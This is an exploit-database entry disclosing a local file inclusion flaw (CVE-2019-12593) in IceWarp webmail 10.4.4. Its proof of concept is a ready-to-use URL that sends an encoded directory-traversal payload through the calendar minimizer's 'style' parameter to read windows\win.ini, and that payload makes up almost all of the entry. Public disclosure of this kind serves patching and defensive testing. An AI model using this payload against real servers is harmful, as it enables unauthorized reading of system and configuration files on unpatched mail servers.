IceWarp 10.4.4 - Local File Inclusion

Author: JameelNabbo
type: webapps
platform: php
port: 
date_added: 2019-06-04 
date_updated: 2019-06-04 
verified: 0 
codes: CVE-2019-12593 
tags: File Inclusion (LFI/RFI)
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: IceWarp <=10.4.4 local file include
# Date: 02/06/2019
# Exploit Author: JameelNabbo
# Website: uitsec.com
# Vendor Homepage: http://www.icewarp.com
# Software Link: https://www.icewarp.com/downloads/trial/
# Version: 10.4.4
# Tested on: Windows 10
# CVE: CVE-2019-12593
POC:

http://example.com/webmail/calendar/minimizer/index.php?style=[LFI]

Example:
http://example.com/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini